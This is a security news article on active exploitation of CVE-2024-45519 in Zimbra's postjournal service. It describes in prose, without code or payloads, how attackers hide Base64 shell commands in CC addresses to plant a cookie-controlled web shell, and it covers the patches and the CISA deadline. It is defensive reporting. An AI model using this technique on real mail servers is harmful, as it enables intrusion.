Cybersecurity experts have issued alerts regarding ongoing exploitation attempts surrounding a recently identified vulnerability in Synacor’s Zimbra Collaboration software. Enterprise security firm Proofpoint detected malicious activity linked to this flaw beginning on September 28, 2024. The targeted vulnerability, tracked as CVE-2024-45519, is a critical security issue within Zimbra’s postjournal service, potentially allowing unauthorized attackers to execute arbitrary commands on affected systems.
The attacks involve spoofed Gmail emails sent to fabricated addresses in the CC fields, aiming for Zimbra servers to misinterpret these entries as legitimate commands. According to Proofpoint, the email addresses included Base64 encoded strings, which are executed using the shell utility. This methodology aligns with tactics observed in cyber operations focused on initial access and command execution—a breach potentially facilitated through techniques found in the MITRE ATT&CK framework.
Zimbra addressed this significant security flaw in several patches, including versions 8.8.15 Patch 46 and 10.1.1, released on September 4, 2024. Security researcher Alan Li, known in the community as lebr0nli, was instrumental in uncovering and reporting this vulnerability. Despite the optional nature of the postjournal feature, Synacor emphasizes the importance of applying the provided patches to mitigate the risk of exploitation.
For Zimbra instances where the postjournal feature is disabled and immediate patch application is not feasible, Synacor recommends a temporary measure: the removal of the postjournal binary. This approach may help counteract risks until a permanent solution can be implemented.
Proofpoint has identified specific addresses that, once decoded, attempt to deploy a web shell on compromised Zimbra servers, targeting a directory associated with Zimbra’s administrative interface. This web shell is designed to listen for incoming connections while validating a JSESSIONID Cookie field and utilizing Base64 commands stored in the JACTION cookie for execution. So far, the attacks have not been definitively linked to a known threat actor or group.
The exploitation activities appear to have surged shortly after Project Discovery published technical details about the vulnerability. The issue has been traced back to unsanitized user input processed by the postjournal binary, permitting arbitrary command injections. Analysts have noted that this capability poses a serious risk, as it allows malicious actors to manipulate server operations with crafted emails containing manipulated SMTP messages.
In response to these active threat dynamics, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-45519 to its Known Exploited Vulnerabilities catalog on October 3, 2024. This designation requires Federal Civilian Executive Branch agencies to address the flaw by October 24, 2024, highlighting the urgency of these vulnerabilities across federal systems.
Considering the ongoing exploitation attempts, cybersecurity professionals strongly advise all users to promptly implement the latest patches. This proactive measure is essential for safeguarding against potential threats that could disrupt operations and compromise sensitive data.
